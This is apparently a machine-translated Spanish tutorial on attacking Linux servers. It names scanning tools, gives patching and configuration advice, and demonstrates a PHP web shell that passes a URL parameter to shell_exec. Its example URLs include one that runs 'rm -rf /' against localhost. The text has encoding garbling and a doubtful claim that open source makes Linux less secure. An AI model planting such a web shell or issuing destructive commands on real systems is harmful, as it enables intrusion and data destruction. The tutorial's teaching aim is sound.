Hackear el sistema operativo Linux: hackear con Ubuntu (Tutorial de comandos)

Linux es el sistema operativo para servidores mรกs utilizado, especialmente para servidores web. Es de cรณdigo abierto, lo que significa que cualquiera puede tener acceso al cรณdigo fuente. Esto lo hace menos seguro en comparaciรณn con otros sistemas operativos, ya que los atacantes pueden estudiar el cรณdigo fuente para encontrar vulnerabilidades.. Linux for Hackers consiste en explotar estas vulnerabilidades para obtener acceso no autorizado a un sistema.

En este artรญculo, le presentaremos quรฉ es Linux, sus vulnerabilidades de seguridad, piraterรญa con Ubuntu y las contramedidas que puede implementar.

Nota rรกpida sobre Linux

Linux es un sistema operativo de cรณdigo abiertoExisten muchas distribuciones de sistemas operativos basados โ€‹โ€‹en Linux, como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro en lo que se refiere a seguridad. Esto se debe a que el cรณdigo fuente estรก disponible de forma gratuita, por lo que es fรกcil estudiarlo en busca de vulnerabilidades y explotarlas en comparaciรณn con otros sistemas operativos que no son de cรณdigo abierto. Linux se puede utilizar como sistema operativo para servidores, computadoras de escritorio, tabletas o dispositivos mรณviles.

Los programas de Linux se pueden manejar mediante la interfaz grรกfica de usuario o comandos. Los comandos de Linux para Kali Linux La piraterรญa es mรกs efectiva y eficiente en comparaciรณn con el uso de la GUI. Por esta razรณn, es รบtil conocer los comandos bรกsicos de Linux para hackear.

Consulte estos tutoriales. https://www.guru99.com/unix-linux-tutorial.html sobre cรณmo empezar con Kali Linux hacks

Herramientas de piraterรญa de Linux

  • Nessusโ€“ esta herramienta se puede utilizar para Ubuntu piratear, escanear ajustes de configuraciรณn, parches y redes, etc., se puede encontrar en https://www.tenable.com/products/nessus
  • Mapa N. Esta herramienta se puede utilizar para monitorear los hosts que se ejecutan en el servidor y los servicios que utilizan. Tambiรฉn se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
  • SARA โ€“ SARA es el acrรณnimo de Asistente de Investigaciรณn del Auditor de Seguridad. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL Injection, XSS, etc., se puede encontrar en http://www-arc.com/sara/sara.html

La lista de arriba no es exhaustiva; le da una idea de las herramientas disponibles para Ubuntu Hackear y hackear sistemas Linux.

Cรณmo prevenir hacks de Linux

Los ataques de hackers a Linux se aprovechan de las vulnerabilidades del sistema operativo. Una organizaciรณn puede adoptar la siguiente polรญtica para protegerse contra este tipo de ataques.

  • Gestiรณn de parchesโ€“ los parches corrigen errores que los atacantes aprovechan para comprometer un sistema. Una buena polรญtica de gestiรณn de parches garantizarรก que aplique constantemente parches relevantes a su sistema.
  • Configuraciรณn adecuada del sistema operativoโ€“ otros exploits aprovechan las debilidades en la configuraciรณn del servidor. Se deben desactivar los nombres de usuario y los daemons inactivos. Se deben cambiar las configuraciones predeterminadas, como las contraseรฑas comunes para la aplicaciรณn, los nombres de usuario predeterminados y algunos nรบmeros de puerto.
  • Sistema de detecciรณn de intrusosโ€“ estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir este tipo de ataques.

Actividad de piraterรญa: piratear un Ubuntu Sistema Linux usando PHP

En este escenario prรกctico, aprenderemos cรณmo hackear con Ubuntu y le proporcionaremos informaciรณn bรกsica sobre cรณmo puede utilizar PHP comprometer un Linux. No vamos a apuntar a ninguna vรญctima. Si desea probarlo, puede instalar LAMPP en su mรกquina local.

PHP viene con dos funciones que pueden usarse para ejecutar comandos de piraterรญa de Linux. Tiene funciones exec() y shell_exec(). La funciรณn exec() devuelve la รบltima lรญnea de la salida del comando mientras que shell_exec() devuelve el resultado completo del comando como una cadena.

Para fines de demostraciรณn, supongamos que el atacante logra cargar el siguiente archivo en un servidor web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

AQUร,

El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta usando shell_exec() y los resultados se devuelven en el navegador.

El cรณdigo anterior se puede explotar utilizando la siguiente URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AQUร,

  • โ€œโ€ฆkonsole.php?cmd=ls%20-lโ€asigna el valor ls โ€“l a la variable cmd.

El comando en Ubuntu para hackear contra el servidor se ejecutarรก como

shell_exec('ls -l') ;

La ejecuciรณn del cรณdigo anterior en un servidor web arroja resultados similares a los siguientes.

Hackear un Ubuntu Sistema Linux usando PHP

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos.

Supongamos que el atacante pasa el siguiente comando

rm -rf /

AQUร,

  • โ€œrmโ€ elimina los archivos
  • "rf" hace que el comando rm se ejecute en modo recursivo. Eliminar todas las carpetas y archivos
  • โ€œ/โ€ indica al comando que comience a eliminar archivos del directorio raรญz

La URL del ataque se verรญa asรญ

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos mรณviles.
  • Linux Es de cรณdigo abierto y cualquiera puede obtener el cรณdigo fuente. Esto facilita la detecciรณn de vulnerabilidades. Es uno de los mejores sistemas operativos para piratas informรกticos.
  • Comandos bรกsicos y de hacking de redes en Ubuntu son valiosos para los piratas informรกticos de Linux.
  • Las vulnerabilidades son una debilidad que puede explotarse para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.

Resumir este post con: